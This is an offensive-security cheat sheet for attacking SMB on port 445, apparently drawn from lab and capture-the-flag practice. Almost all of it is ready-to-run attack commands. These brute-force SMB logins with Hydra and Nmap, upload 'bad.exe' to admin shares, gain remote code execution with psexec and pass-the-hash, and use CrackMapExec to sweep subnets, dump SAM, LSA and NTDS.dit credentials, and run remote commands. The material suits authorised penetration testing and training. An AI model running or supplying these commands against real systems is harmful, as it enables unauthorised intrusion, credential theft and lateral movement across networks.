SMB - 445

SMB Bruteforcing

  • Hydra Command: Execute SMB brute forcing using username and password lists.

  • Nmap Command: Nmap script for SMB brute force using username and password files.

Check the domain lockout policy first (see --pass-pol below): every guess against a domain account counts toward its lockout threshold, so an unthrottled run against a user list can lock out the whole domain.

hydra -L /home/pentester/Wordlists/Usernames.txt -P /home/pentester/Wordlists/Passwords.txt -vV 172.19.19.70 smb
# smb-brute takes its lists via userdb/passdb; pass all script arguments in one --script-args (a second --script-args overrides the first, and ssh-brute.timeout belongs to the ssh-brute script, not smb-brute)
nmap -p445 172.25.30.4 --script smb-brute --script-args userdb=/home/kali/wordlistcpent/usernames,passdb=/home/kali/wordlistcpent/passwords

SMB Enumeration

# Run every SMB NSE script against the target (quote the wildcard so the shell does not expand it; 138 is UDP NetBIOS datagram, so it is not part of a TCP scan)
nmap -p 139,445 --script "smb*" <IP>
# Connect to a share via SMB
smbclient \\\\IP\\c$ -U Administrator

# Extract domain and computer info with enum4linux (target is required; credentials are optional and fall back to a null session)
enum4linux -a -u 'Administrator' -p 'iloveu' <IP>

# Upload a file to a share via smbclient (the argument after the share name is the password)
smbclient -c 'put bad.exe' -U t1_leonard.summers -W ZA '//thisis.za.tryhackme.com/admin$' EZpass4ever

# List shares
smbclient -L 10.129.170.128 -U Administrator

# Connect to the ADMIN$ share (C:\Windows); requires local administrator rights on the target
smbclient \\\\10.10.10.131\\ADMIN$ -U Administrator

# List shares without asking for a password (null session)
smbclient -N -L 10.0.0.43

# Show all NetBIOS names and services registered by the host (Windows; on Linux use nmblookup -A <IP>)
nbtstat -A <IP>

Impacket

# Use impacket for remote code execution through SMB (psexec.py writes a service binary to ADMIN$ and starts it, so it needs local admin on the target)
python3 /usr/share/doc/python3-impacket/examples/psexec.py active.htb/administrator:'<PASSWORD>'@<TARGET_IP>
# Pass the hash: impacket expects LMHASH:NTHASH; the LM half may be left empty (-hashes :NTHASH)
python3 /usr/share/doc/python3-impacket/examples/psexec.py -hashes LMHASH:NTHASH DOMAIN/MyUser@VICTIM_IP
impacket-psexec ECC.LOCALNET/administrator:'Pa$$w0rd123'@172.25.170.80

# Using PsExec.exe (Sysinternals) from Windows to have code execution via SMB
PsExec.exe \\172.25.170.110 cmd.exe

CrackMapExec

CrackMapExec (CME) can be used to enumerate SMB sessions, Active Directory group memberships, and SMB shares. Most examples below target a whole /24; a credentialed sweep authenticates once to every live host, so a wrong password costs one failed logon per host against the lockout threshold. Below are some typical usage examples:

1. Map network hosts

# Returns a list of live hosts in the network
cme smb 192.168.1.0/24

2. Generate Relay List

# Maps the network of live hosts and saves a list of hosts that don't require SMB signing (candidate targets for NTLM relay, e.g. ntlmrelayx -tf)
cme smb 192.168.1.0/24 --gen-relay-list relaylistOutputFilename.txt

3. Enumerate shares and access

# Enumerates shares on the network using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --shares

4. Enumerate active sessions

# Lists active sessions on the network using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sessions

5. Enumerate disks

# Lists disks on the network using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --disks

6. Enumerate logged on users

# Lists logged on users on the network using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --loggedon-users

7. Enumerate domain users

# Lists domain users on the network using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --users

8. Enumerate users by bruteforcing RID

# Enumerates users and groups by cycling RIDs through LSA SID lookups; works with low-privileged credentials (and on some DCs with a null session) where --users is refused
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --rid-brute

9. Enumerate domain groups

# Lists domain groups on the network using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --groups

10. Enumerate local groups

# Lists local groups on the network using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-groups

11. Obtain domain password policy

# Retrieves the domain password policy using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --pass-pol

12. Authentication with User/Password

# Attempts authentication using username and password
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE'

13. Authentication with User/Hash

# Attempts authentication using username and NTLM hash
cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT'

14. Null Sessions

# Attempts authentication with null sessions
cme smb 192.168.1.0/24 -u '' -p ''

15. Using Username/Password Lists

# Uses lists of usernames and passwords for authentication attempts
cme smb 192.168.1.101 -u /path/to/users.txt -p /path/to/passwords.txt

16. Authentication with Local Auth

# Authenticates against each host's local SAM instead of the domain (use with local Administrator credentials or a dumped local hash)
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-auth

17. Dump SAM hashes

# Dumps SAM hashes using methods from secretsdump.py
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam

18. Dump LSA secrets

# Dumps LSA secrets using methods from secretsdump.py
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa

19. Dump NTDS.dit

# Dumps the NTDS.dit from the target DC using methods from secretsdump.py (requires a domain admin or otherwise DCSync-capable account)
cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds

20. Spidering Shares

# Spiders the C$ share for files with 'txt' in the name (--pattern matches file names, not contents; use --content to grep inside files)
cme smb <IP> -u USER -p PASSWORD --spider C\$ --pattern txt

21. Command Execution

# Executes commands on remote systems using specified method
cme smb 10.10.33.121 -u Administrator -p AAdmin\!23 -X '$PSVersionTable' --exec-method wmiexec

22. WMI Query Execution

# Issues the specified WMI query
cme smb 10.10.33.121 -u Administrator -p 'P@ssw0rd' --wmi "SELECT * FROM Win32_logicalDisk WHERE DeviceID = 'C:'"

23. WMI Query Execution in a Specific Namespace

# Issues a WMI query in the specified namespace (--wmi-namespace only has effect together with --wmi; a single backslash is correct inside single quotes)
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --wmi "SELECT * FROM Win32_logicalDisk WHERE DeviceID = 'C:'" --wmi-namespace 'root\cimv2'

This runs the query within the root\cimv2 namespace, which holds the common system-management classes (Win32_*) and is the default when no namespace is given.